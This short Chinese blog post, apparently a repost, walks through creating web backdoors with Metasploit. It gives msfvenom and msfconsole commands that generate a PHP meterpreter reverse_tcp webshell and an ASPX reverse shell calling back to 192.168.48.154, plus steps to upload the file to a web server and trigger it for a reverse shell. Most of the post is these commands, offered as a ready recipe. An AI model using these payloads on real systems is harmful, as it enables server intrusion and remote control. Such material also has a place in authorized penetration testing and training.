msfconsole web后门

一、PHP后门

在meterpreter中有一个名为PHP meterpreter的payload,利用这个可以成功反弹。步骤如下:

  1. 使用msfvenom 创建一个webshell.php

  2. 上传到服务器

  3.开始监听

  4.访问webshell.php的页面

  5. 获得反弹Shell

payload :

 msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.48.154 -f raw > webshell.php
cp webshell.php /var/www/html

开始监听得到shell:

 二、 aspx 后门

  步骤与前面大致相同,就是payload有点小小区别吧。

按着步骤敲吧,

use windows/shell_reverse_tcp
info
set lhost 192.168.48.154
set lport 4444
save
generate -f aspx (或者asp)

 最后将生成的payload 复制出来上传到服务器,即可得到shelle

猜你喜欢

转载自www.cnblogs.com/kuaile1314/p/11648136.html